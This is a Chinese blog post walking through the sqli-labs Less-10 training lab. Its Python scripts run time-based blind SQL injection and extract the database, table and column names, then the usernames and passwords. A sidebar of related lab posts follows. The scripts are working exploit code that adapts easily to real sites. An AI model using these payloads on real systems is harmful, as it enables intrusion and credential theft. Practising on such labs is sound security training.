SQL注入实例(sqli-labs/less-10)

已于 2024-08-05 23:05:49 修改
阅读量236 收藏
点赞数 1
分类专栏: sql靶场练习 文章标签: python 数据库 开发语言
于 2024-08-05 23:05:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/140939234
版权

0、初始页面

 1、爆库名

使用python脚本

def inject_database1(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1\" and if(ascii(substr(database(),%d,1)) > %d ,sleep(2),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 2:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)

2、爆表名

使用python脚本

def inject_database1(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1\" and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)

3、爆列名

使用python脚本

def inject_database1(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1\" and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),%d,1) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database1(url)

4、显示最终目的

使用python脚本

def inject_database1(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1\" and if(ascii(substr((select group_concat(username,0x3a,password) from users),%d,1)) > %d ,sleep(1),0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

魏大橙
关注
专栏目录
SQL注入-08】二次注入案例—以sqli-labs-less24为例
m0_64378913的博客
05-06 1465
1 二次注入概述 1.1 定义 定义:在将数据(一次注入的)存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。 例子:在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。 1.2 思路 (1)黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或
SQL注入-10】cookie注入案例—以Sqli-labs靶机第less20关为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2044
目录1 cookie注入概述2 cookie注入案例2.1 实验平台2.2 实验过程3.1 前戏 1 cookie注入概述 定义:cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数以cookie的方式提交。 一般的注入我们是使用get或者post方式提交: get方式提交就是直接在网址后面加上需要注入的语句; post则是通过表单方式, get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。 2 cookie注入案例 2.1 实验平台 靶机:Ce
数据库实例 下载
12-03
期末,数据库老师让做一个用数据库结合任何一门语言做个小作品。刚好最近在学一点html/css,又会看了一点点jsp的视频,做出了个小东西,在此记录,共同进步。用到的软件:sql server,servlet,myEclipse 具体的要求如下: ①读者基本信息的输入,包括借书证编号、读者姓名、读者性别,读者年级,系别等。 ②读者基本信息的查询、修改,包括读者借书证编号、读者姓名、读者性别,读者已借出的图书相关信息,读者可借出图书数本(假设读者借书数目的上限为5)等。 ③书籍类别标准的制定、类别信息的输入,包括类别编号、类别名称。 ④书籍类别信息的查询、修改,包括类别编号、类别名称。 ⑤书籍库存信息的输入,包括书籍编号、书籍名称、书籍类别、作者姓名、出版社名称,剩余可借出的书籍数目。 ⑥书籍库存信息的查询,修改,包括书籍编号、书籍名称、书籍类别、作者姓名、出版社名称,剩余可借出的书籍数目等。 ⑦借书信息的输入,包括读者借书证编号、书籍编号。 ⑧借书信息的查询、修改,包括借书证编号、读者姓名、书籍编号、书籍名称等。 ⑨还书信息的输入,包括借书证编号、书籍编号。 ⑩还书信息的查询和修改,包括还书读者借书证编号、读者姓名、书籍编号、书籍名称等。
SQL注入实例sqli-labs/less-9)
最新发布
Thewei666的博客
08-05 429
使用python脚本。
Sqli-labs less 10
weixin_34122548的博客
08-11 132
Less-10 本关我们从标题就可以看到 《基于时间-双引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 " 的处理。和less9的区别就在于单引号(')变成了("),我们这里给出一个payload示例,其他的请参考less-9 猜测数据库: http://127.0.0.1/sqllib/Less-10/?id=1"and%20If(ascii(substr(data...
sqlilabs less10
TA不懒,但还没有添加简介
06-27 194
sqlilabs less10
SQLI-Lab】-Less10
xinyue9966的博客
01-27 331
Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload htt
sqli-labs Less-5解题思路
qq_35266419的博客
05-12 685
从本节开始就学习盲注,思路较 Less1-4略有不同,请仔细体会 Less-5 Get-Double injection-Single Quotes - String (1)查看页面源代码 通过页面源代码,什么都不显示 (2)猜测数据库的长度 当数据库长度正确和错误时,如上图所示 (3)现在开始猜测数据库第一位(其实盲注和前面几个的解题思路一样,只是手法稍有不同) (4)猜测数据库名称第二...
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2624
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入点及注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入点及注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
SQLi-LABS Page-1(Basic Challenges)
07-24
1. **Less-1** 是一个基础的SQL注入实例,它展示了如何利用单引号来触发错误并揭示SQL结构。通过观察错误信息,学习者可以识别注入点并尝试构造SQL语句。 2. **Less-2** 和 **Less-3** 关卡中,学习者需要识别数字...
sql实例
04-25
一个有关俱乐部的SQL数据库
SQL学习实例文件
11-12
学习SQL Server 数据库实例文件,里面有MDF,LDF还有SQL语句,帮助你在学习数据库时更好的实际操作!
sql例子大全sql例子大全
01-11
sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全sql大全
SQL数据库实例
01-19
这是我公司做的数据库实例,立体车库操作系统,包含车牌识别的东西
mysql实例sql文件
11-29
mysql实例sql文件
sqli labs注入记录(Less-1至Less-10
08-25 278
Less-1:基于错误的GET单引号字符型注入 我们首先注入一个单引号’,出现SQL语法错误,多出一个单引号,后面闭合语句也是用的单引号: http://127.0.0.1/sqli_labs/Less-1/?id=1’ 再次注入一条SQL语句,因为条件永远为真,响应正常: http://127.0.0.1/sqli_labs/Less-1/?id=1' and '1'='...
SQLi LABS Less 10 时间盲注
热门推荐
wangyuxiang946的博客
06-27 1万+
SQLi 第十关,SQLi-LABS Less-10SQLi-LABS Less 10SQLiLABS Less10SQLi Less 10
sqli-lab Less-1 ~~Less-10手工注入文档
weixin_44237647的博客
07-22 304
LESS-1 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 输入' 后报错 ''1'' limit 0,1' 所以加'' 显示正常界面,由此得出正常的sql语句 ?id=1' order by 3 --+ 使用二分法尝试 ?id=-1' union select 1,2,3 --+ 得出所在位置 ?id=-1' union sele...
sqli-lab教程Less-10
Brucye
03-23 441
less-10 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 时间盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select c
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值